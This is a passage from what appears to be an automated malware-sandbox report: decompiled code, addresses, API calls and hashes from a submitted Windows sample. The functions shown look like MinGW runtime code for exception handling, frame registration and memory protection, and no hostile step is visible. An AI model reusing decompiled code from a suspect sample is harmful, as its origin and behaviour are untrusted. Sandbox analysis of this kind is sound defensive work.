								 *_t88 = 2;
								_t64 = _t50;
								_v32 =  *_t85();
								_v36 = 0xb;
								_v40 = 1;
								 *_t88 = "  what():  ";
								fwrite(??, ??, ??, ??);
								 *_t88 = 2;
								_v40 =  *_t85();
								 *_t88 = _t50;
								fputs(??, ??);
								 *_t88 = 2;
								_v40 =  *_t85();
								 *_t88 = 0xa;
								fputc(??, ??);
								E01477BA0(_t50, _t82, _t85, _t86);
								goto L33;
							}
							 *_t88 = _t85;
							_t78 = 0x14adf58;
							_t44 = E013E55D0( &_v20, 0, 0x14adf58);
							__eflags = _t44;
							if(_t44 == 0) {
								goto L30;
							}
							 *_t88 = 4;
							_t59 = E01477A00(_t64, _t85);
							 *_t59 = 0x14b17f4;
							_v36 = 0x1445e30;
							_v40 = 0x14adf58;
							 *_t88 = _t59;
							E01477F00(0, 0x14adf58, _t82, _t85, _t86);
							goto L28;
						}
						_t64 =  *_t64;
						goto L25;
					}
					_t83 = __edx;
					switch( *((intOrPtr*)((_t36 & 0x000000ff) * 4 +  &M014A7F98))) {
						case 0:
							_t80 =  *((intOrPtr*)(__ecx));
							_t62 = __ecx + 4;
							goto L4;
						case 1:
							_v36 = __ebx;
							__edx = 0;
							__eax = __ecx;
							__ecx = 0;
							__eflags = 0;
							__ebp = 0;
							do {
								__edx =  *__eax & 0x000000ff;
								__eax =  &(__eax[1]);
								__edx = __edx & 0x0000007f;
								__ebx = (__edx & 0x0000007f) << __cl;
								__ecx =  &(__ecx[1]);
								__ebp = __ebp | (__edx & 0x0000007f) << __cl;
								__eflags = __dl;
							} while (__dl < 0);
							__ebx = _v36;
							__edx = __ebp;
							goto L4;
						case 2:
							__edx =  *__ecx & 0x0000ffff;
							__eax =  &(__ecx[0]);
							goto L4;
						case 3:
							__edx =  *__ecx;
							__eax =  &(__ecx[2]);
							goto L4;
						case 4:
							goto L20;
						case 5:
							_v32 = __ebx;
							__edx = 0;
							__eax = __ecx;
							__ecx = 0;
							__eflags = 0;
							__ebp = 0;
							do {
								__edx =  *__eax & 0x000000ff;
								__eax =  &(__eax[1]);
								__edx = __edx & 0x0000007f;
								__ebx = (__edx & 0x0000007f) << __cl;
								__ecx =  &(__ecx[1]);
								__ebp = __ebp | (__edx & 0x0000007f) << __cl;
								__eflags = __dl;
							} while (__dl < 0);
							_v36 = __dl;
							__ebx = _v32;
							__edx = __ebp;
							__ebp = _v36 & 0x000000ff;
							__eflags = __ecx - 0x1f;
							if(__ecx > 0x1f) {
								goto L4;
							} else {
								__ebp = __ebp & 0x00000040;
								__eflags = __ebp;
								if(__ebp == 0) {
									goto L4;
								} else {
									0xffffffff = 0xffffffff << __cl;
									__edx = __edx | 0xffffffff << __cl;
									goto L5;
								}
							}
							goto L37;
						case 6:
							__edx =  *__ecx;
							__eax =  &(__ecx[0]);
							L4:
							if(_t80 == 0) {
								L6:
								 *_a4 = _t80;
								return _t62;
							} else {
								L5:
								_t84 =  ==  ? _t85 : _t83;
								_t80 = _t80 + ( ==  ? _t85 : _t83);
								if(_t63 < 0) {
									 *_a4 =  *_t80;
									return _t62;
								} else {
									goto L6;
								}
							}
							goto L37;
					}
				}
				L37:
			}

0x013e5773
0x013e5776
0x013e577b
0x013e57d7
0x013e57dc
0x013e57dc
0x013e57df
0x013e57e8
0x013e577d
0x013e577d
0x013e577f
0x013e5784
0x01478770
0x01478770
0x01478778
0x01478780
0x01478788
0x0147878d
0x01478790
0x01478795
0x0147879c
0x0147879f
0x014787a9
0x014787ab
0x014787af
0x01478816
0x01478816
0x014787b3
0x014787bb
0x014787c0
0x014787c3
0x014787cc
0x014787d1
0x014787d3
0x0147882f
0x01478834
0x01478834
0x01478837
0x0147883c
0x01478841
0x01478844
0x01478849
0x01478851
0x01478854
0x01478857
0x014788d5
0x014788d5
0x014788da
0x014788c3
0x014788c3
0x014788c8
0x014788cb
0x014788d0
0x00000000
0x014788d0
0x01478862
0x01478865
0x0147886c
0x01478870
0x01478874
0x0147887c
0x01478884
0x0147888b
0x01478890
0x01478899
0x0147889d
0x014788a0
0x014788a5
0x014788ae
0x014788b2
0x014788b9
0x014788be
0x00000000
0x014788be
0x014787d5
0x014787da
0x014787e3
0x014787e8
0x014787ea
0x00000000
0x00000000
0x014787ec
0x014787f3
0x014787f8
0x014787fe
0x01478806
0x0147880e
0x01478811
0x00000000
0x01478811
0x014787b1
0x00000000
0x014787b1
0x013e578d
0x013e578f
0x00000000
0x013e57a0
0x013e57a2
0x00000000
0x00000000
0x013e5830
0x013e5834
0x013e5836
0x013e5838
0x013e5838
0x013e583a
0x013e5840
0x013e5840
0x013e5843
0x013e5848
0x013e584b
0x013e584d
0x013e5850
0x013e5852
0x013e5852
0x013e5856
0x013e585a
0x00000000
0x00000000
0x013e5810
0x013e5813
0x00000000
0x00000000
0x013e5800
0x013e5802
0x00000000
0x00000000
0x00000000
0x00000000
0x013e5868
0x013e586c
0x013e586e
0x013e5870
0x013e5870
0x013e5872
0x013e5878
0x013e5878
0x013e587b
0x013e5880
0x013e5883
0x013e5885
0x013e5888
0x013e588a
0x013e588a
0x013e588e
0x013e5892
0x013e5896
0x013e5898
0x013e589d
0x013e58a0
0x00000000
0x013e58a6
0x013e58a6
0x013e58a6
0x013e58a9
0x00000000
0x013e58af
0x013e58b4
0x013e58b6
0x00000000
0x013e58b6
0x013e58a9
0x00000000
0x00000000
0x013e5820
0x013e5823
0x013e57a5
0x013e57a7
0x013e57ba
0x013e57be
0x013e57c7
0x013e57a9
0x013e57a9
0x013e57b1
0x013e57b4
0x013e57b8
0x013e57f6
0x013e57ff
0x00000000
0x00000000
0x00000000
0x013e57b8
0x00000000
0x00000000
0x013e578f
0x00000000

APIs

abort.MSVCRT(?,?,?,?,?,?,013E564F), ref: 01478770
abort.MSVCRT(?,?,?,?,?,?,013E55AC,?,?,?,?,?,?,014787C0), ref: 01478778
abort.MSVCRT(?,?,?,?,?,?,013E55AC,?,?,?,?,?,?,014787C0), ref: 01478780
abort.MSVCRT(?,?,?,?,?,?,013E55AC,?,?,?,?,?,?,014787C0), ref: 01478788

Strings

what(): , xrefs: 01478884

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID: what():
API String ID: 4206212132-593870882
Opcode ID: ddb2d118f3e4faafb9f03d5a43c97d6e1d04e76dd7fec9808e09ee9f7db3a323
Instruction ID: 57ad3e79315f96632a4834b71ce806ce95388d47245e3b623a8d405f2131f885
Opcode Fuzzy Hash: ddb2d118f3e4faafb9f03d5a43c97d6e1d04e76dd7fec9808e09ee9f7db3a323
Instruction Fuzzy Hash: D1511671A04316CFD700BF78C4C86AEBBE1EFA5308F96882ED4859B3A1DB359445CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013D8C90 Relevance: 21.1, APIs: 14, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E013D8C90(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v0;
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v156;
				char _v284;
				char _v288;
				intOrPtr _v312;
				char* _v356;
				void* _t32;
				void* _t34;
				struct HINSTANCE__* _t35;
				_Unknown_base(*)()* _t36;
				struct HINSTANCE__* _t39;
				_Unknown_base(*)()* _t40;
				void* _t42;
				CHAR* _t46;
				struct HINSTANCE__* _t48;
				CHAR* _t59;
				intOrPtr _t61;
				void* _t66;
				void* _t71;
				intOrPtr _t72;
				_Unknown_base(*)()* _t73;
				void* _t77;
				void* _t81;
				intOrPtr* _t83;
				char** _t84;
				char** _t85;
				struct HINSTANCE__** _t87;
				struct HINSTANCE__** _t88;

				_t77 = _t81;
				_t71 =  &_v284;
				_t46 =  &_v156;
				_push(__edx);
				_push(__eax);
				E013D8320( &_v284, _v0,  &_a4);
				_t59 = _t46;
				_t32 = memcpy(_t46, _t71, 0x20 << 2);
				_t83 = _t81 - 0x124 + 0xc;
				_t66 = _t71 + 0x40;
				_t9 = _t32 + 0xc; // 0x4b16f801
				_t72 =  *_t9;
				if(_t72 != 0) {
					_t34 = E013D8670(_a4,  &_v288, _t59);
				} else {
					__eax = E013D8520(__eax, __ecx, __edx);
				}
				if(_t34 != 7) {
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					abort();
					_push(_t77);
					_push(_t66);
					_push(_t72);
					_t84 = _t83 - 0x1c;
					 *_t84 = "libgcc_s_dw2-1.dll";
					_t35 = GetModuleHandleA(_t46);
					_t85 = _t84 - 4;
					if(_t35 == 0) {
						_t36 = 0x13dae40;
						_t73 = E013DA660;
					} else {
						_t48 = _t35;
						 *_t85 = "libgcc_s_dw2-1.dll";
						_t39 = LoadLibraryA(??);
						_t87 = _t85 - 4;
						 *0x14f2020 = _t39;
						_v356 = "__register_frame_info";
						 *_t87 = _t48;
						_t40 = GetProcAddress(??, ??);
						_t88 = _t87 - 8;
						_t73 = _t40;
						_v356 = "__deregister_frame_info";
						 *_t88 = _t48;
						_t36 = GetProcAddress(??, ??);
						_t85 = _t88 - 8;
					}
					 *0x1481004 = _t36;
					if(_t73 != 0) {
						_v356 = 0x14f2024;
						 *_t85 = 0x14b3104;
						 *_t73();
					}
					 *_t85 = E013C1560;
					return E013C14A0();
				} else {
					_t42 = E013D6750( &_v284, _t46);
					_t61 = _v80;
					_v312 = _t61;
					 *_t83 = _v84;
					 *((intOrPtr*)(_t77 + E013D8A30(_t42) + 4)) = _t61;
					return _v24;
				}
			}

0x013d8c91
0x013d8c95
0x013d8c9c
0x013d8ca2
0x013d8ca8
0x013d8cb8
0x013d8cc5
0x013d8cc7
0x013d8cc7
0x013d8cc7
0x013d8ccf
0x013d8ccf
0x013d8cd4
0x013d8d25
0x013d8cd6
0x013d8cd6
0x013d8cd6
0x013d8cde
0x0147aa32
0x0147aa37
0x0147aa3c
0x0147aa44
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d8ce4
0x013d8cec
0x013d8cf1
0x013d8cf4
0x013d8cfb
0x013d8d09
0x013d8d21
0x013d8d21

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d7a9361a978207effb0f80c28f5860b63604c79c14d407ddcc1f72fc1c6f8be
Instruction ID: 351920a31e731605fddcd59eddde6c18d8d2f8157edbfb72adddbe000129bb8e
Opcode Fuzzy Hash: 4d7a9361a978207effb0f80c28f5860b63604c79c14d407ddcc1f72fc1c6f8be
Instruction Fuzzy Hash: 1B116A76D0021D9BCB14EF98D8809EEF7B9AF99314F1181A9DC0977340EB30AE458B91

Uniqueness

Uniqueness Score: -1.00%

Function 013D8D30 Relevance: 19.6, APIs: 13, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E013D8D30(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, CHAR* _a4) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v156;
				char _v284;
				char _v288;
				intOrPtr _v312;
				char* _v356;
				void* _t37;
				struct HINSTANCE__* _t39;
				_Unknown_base(*)()* _t40;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				void* _t46;
				CHAR* _t51;
				struct HINSTANCE__* _t53;
				intOrPtr _t54;
				_Unknown_base(*)()* _t75;
				void* _t79;
				void* _t83;
				intOrPtr* _t84;
				char** _t85;
				char** _t86;
				struct HINSTANCE__** _t88;
				struct HINSTANCE__** _t89;

				_t74 = __esi;
				_t68 = __edi;
				_t79 = _t83;
				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_push(__edx);
				_push(__eax);
				_t84 = _t83 - 0x124;
				_t51 = _a4;
				if(_t51[0xc] != 0) {
					_t74 =  &_v284;
					E013D8320( &_v284, _v0,  &_a4);
					_t37 = memcpy( &_v156, _t74, 0x20 << 2);
					_t84 = _t84 + 0xc;
					_t68 = _t74 + 0x40;
					if(E013D8670(_t37,  &_v288,  &_v156) != 7) {
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						abort();
						_push(_t79);
						_push(_t74);
						_t85 = _t84 - 0x1c;
						 *_t85 = "libgcc_s_dw2-1.dll";
						_t39 = GetModuleHandleA(_t51);
						_t86 = _t85 - 4;
						if(_t39 == 0) {
							_t40 = 0x13dae40;
							_t75 = E013DA660;
						} else {
							_t53 = _t39;
							 *_t86 = "libgcc_s_dw2-1.dll";
							_t43 = LoadLibraryA(??);
							_t88 = _t86 - 4;
							 *0x14f2020 = _t43;
							_v356 = "__register_frame_info";
							 *_t88 = _t53;
							_t44 = GetProcAddress(??, ??);
							_t89 = _t88 - 8;
							_t75 = _t44;
							_v356 = "__deregister_frame_info";
							 *_t89 = _t53;
							_t40 = GetProcAddress(??, ??);
							_t86 = _t89 - 8;
						}
						 *0x1481004 = _t40;
						if(_t75 != 0) {
							_v356 = 0x14f2024;
							 *_t86 = 0x14b3104;
							 *_t75();
						}
						 *_t86 = E013C1560;
						return E013C14A0();
					} else {
						_t46 = E013D6750( &_v284,  &_v156);
						_t54 = _v80;
						_v312 = _t54;
						 *_t84 = _v84;
						E013D8A30(_v84);
						 *((intOrPtr*)(_t79 + _t46 + 4)) = _t54;
						return _v24;
					}
				} else {
					__eax = E013D8A40(__eax, __ebx, __edx, __edi, __esi, __ebx);
					__ebx = _v16;
					__esi = _v12;
					__edi = _v8;
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}

0x013d8d30
0x013d8d30
0x013d8d31
0x013d8d33
0x013d8d34
0x013d8d35
0x013d8d36
0x013d8d37
0x013d8d38
0x013d8d3e
0x013d8d46
0x013d8d6d
0x013d8d73
0x013d8d85
0x013d8d85
0x013d8d85
0x013d8d95
0x0147aa37
0x0147aa3c
0x0147aa44
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d8d9b
0x013d8da7
0x013d8dac
0x013d8db1
0x013d8dbe
0x013d8dc1
0x013d8dc6
0x013d8dde
0x013d8dde
0x013d8d48
0x013d8d4b
0x013d8d50
0x013d8d53
0x013d8d56
0x013d8d59
0x013d8d59
0x013d8d5a
0x013d8d5a

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb9806c5138bdfd9d8f3b4a3cdcf4277f2da096a142e0bc6cb020470c3a5bc7
Instruction ID: fcf472548a7614cd548ef51a43311dfe9a15a8b443e9a68a08321a418badef02
Opcode Fuzzy Hash: cdb9806c5138bdfd9d8f3b4a3cdcf4277f2da096a142e0bc6cb020470c3a5bc7
Instruction Fuzzy Hash: EE210875E0021E9BCF14EF68D8809EEF7B5AB49318F118498D90977341DA30AE498B91

Uniqueness

Uniqueness Score: -1.00%

Function 013DB2C0 Relevance: 18.2, APIs: 12, Instructions: 161COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,?,?,01477CDF), ref: 013DB2FB
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000001,?,?,01477CDF), ref: 013DB302
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,01477CDF), ref: 013DB310

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 146643938df091ff22ac410a407514241a09ca6cebaa212ba37f51b053d8bf6c
Instruction ID: c8f84e0a4c471fa447188999dc8ad004d4577f864a64deca12cc529bee754351
Opcode Fuzzy Hash: 146643938df091ff22ac410a407514241a09ca6cebaa212ba37f51b053d8bf6c
Instruction Fuzzy Hash: 96518176604305CFD720DF28E58462AFBF5FB86348F06852DD94587329EB31E854CB82

Uniqueness

Uniqueness Score: -1.00%

Function 013D54A0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 131filememoryCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 013D54CF
vfprintf.MSVCRT ref: 013D54EF
abort.MSVCRT ref: 013D54F4
VirtualQuery.KERNEL32 ref: 013D558D
VirtualProtect.KERNEL32 ref: 013D55F3
GetLastError.KERNEL32 ref: 013D5600

Strings

Address %p has no image-section, xrefs: 013D564B
Mingw-w64 runtime failure:, xrefs: 013D54C8
VirtualQuery failed for %d bytes at address %p, xrefs: 013D5637
VirtualProtect failed with code 0x%x, xrefs: 013D5606

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1616349570-1534286854
Opcode ID: 7239859e8620a98f92652d22fddaacdffb168d09ffed64a7a783f73260385920
Instruction ID: 7f3050ade4210ce46019a133706005da8120916fc64f8c4a8ebfd629d122ab75
Opcode Fuzzy Hash: 7239859e8620a98f92652d22fddaacdffb168d09ffed64a7a783f73260385920
Instruction Fuzzy Hash: C95136B29053029FC710EF28E484A1AFBF5FF84318F85891DE5899B354E774E954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013D9050 Relevance: 16.6, APIs: 11, Instructions: 94COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: b8a7db1c5123eb8bffdf485cf87fb232ddf5c6b918f7bbe854642c93c33d2fd2
Instruction ID: 3ad0d4938e029d991cd7f7301a422cf69770a050b8eb95b5d33ea2f1ba5c6cb3
Opcode Fuzzy Hash: b8a7db1c5123eb8bffdf485cf87fb232ddf5c6b918f7bbe854642c93c33d2fd2
Instruction Fuzzy Hash: 2D21F6333042198BD704DF6CF8916A6B7AAEBC621CB2C81BED54C8B755D637A806C790

Uniqueness

Uniqueness Score: -1.00%

Function 013D9520 Relevance: 15.1, APIs: 10, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E013D9520(void* __eax, intOrPtr* __edx, char _a4) {
				void* _v16;
				signed int _v32;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v57;
				char* _v116;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t48;
				struct HINSTANCE__* _t51;
				_Unknown_base(*)()* _t52;
				CHAR* _t53;
				struct HINSTANCE__* _t54;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				void* _t63;
				char** _t65;
				char** _t66;
				struct HINSTANCE__** _t68;
				struct HINSTANCE__** _t69;

				_t63 = _t62 - 0x3c;
				_t60 =  *__edx;
				if(_t60 == 0) {
					_v48 = 0;
					goto L40;
				} else {
					__ebx = __edx;
					_v52 = 0;
					__esi = 0;
					__edx = 0;
					_v48 = 0;
					__edi = __eax;
					do {
						__eax =  *(__ebx + 4);
						__eflags = __eax;
						if(__eax == 0) {
							goto L14;
						} else {
							_t16 = __ebx + 4; // 0x5
							__ecx = _t16;
							__ecx = _t16 - __eax;
							_v56 = __ecx;
							__eflags = __ecx - __edx;
							if(__ecx == __edx) {
								__eax = __esi;
								_v57 = __al;
								goto L26;
							} else {
								__eax = _v56;
								__eax = E013D91E0(_v56);
								__esi = __eax;
								__eflags = __eax - 0xff;
								if(__eax == 0xff) {
									_v48 = 0xffffffff;
									break;
								} else {
									_v57 = __al;
									__eflags = __al - 0xff;
									if(__al == 0xff) {
										__eax =  *(__edi + 0x10) & 0x0000ffff;
										_v52 = 0;
										__ax = __ax & 0x000007f8;
										__eflags = __ax - 0x7f8;
										if(__ax != 0x7f8) {
											goto L25;
										} else {
											goto L36;
										}
										goto L26;
									} else {
										__eax = __eax & 0x00000070;
										__eflags = __al - 0x20;
										if(__eflags == 0) {
											__eax =  *(__edi + 4);
											_v52 =  *(__edi + 4);
											goto L23;
										} else {
											if(__eflags <= 0) {
												L32:
												_v52 = 0;
												goto L23;
											} else {
												__eflags = __al - 0x30;
												if(__al != 0x30) {
													__eflags = __al - 0x50;
													if(__al != 0x50) {
														goto L44;
													} else {
														goto L32;
													}
												} else {
													__eax =  *(__edi + 8);
													_v52 =  *(__edi + 8);
													L23:
													__eax =  *(__edi + 0x10) & 0x0000ffff;
													__edx =  *(__edi + 0x10) & 0x0000ffff;
													__dx = __dx & 0x000007f8;
													__eflags = __dx - 0x7f8;
													if(__dx == 0x7f8) {
														L36:
														__edx = _v57 & 0x000000ff;
														__eax =  *(__edi + 0x10) & 0x0000ffff;
														__edx = (_v57 & 0x000000ff) << 3;
														__ax = __ax & 0x0000f807;
														__eax =  *(__edi + 0x10) & 0x0000ffff | (_v57 & 0x000000ff) << 0x00000003;
														 *(__edi + 0x10) = __ax;
														goto L26;
													} else {
														__ax = __ax >> 3;
														__eax = __al & 0x000000ff;
														__eflags = (__al & 0x000000ff) - __esi;
														if((__al & 0x000000ff) == __esi) {
															__eax =  &_v32;
															__edx = _v52;
															_t41 = __ebx + 8; // 0x9
															__ecx = _t41;
															 *__esp =  &_v32;
															__esi = E013D9050(__esi, _t41, _v52);
															goto L27;
														} else {
															L25:
															_t23 = __edi + 0x10;
															 *_t23 =  *(__edi + 0x10) | 0x00000004;
															__eflags =  *_t23;
															L26:
															__edx =  &_v32;
															__eax = __esi;
															_t26 = __ebx + 8; // 0x9
															__ecx = _t26;
															 *__esp =  &_v32;
															__edx = _v52;
															__al & 0x000000ff = E013D9050(__al & 0x000000ff, _t26, _v52);
															__eflags = _v57 - 0xff;
															if(_v57 == 0xff) {
																L13:
																__edx = _v56;
																goto L14;
															} else {
																L27:
																__eax = _v57 & 0x000000ff;
																__eax = _v57 & 7;
																__eflags = __al - 2;
																if(__eflags == 0) {
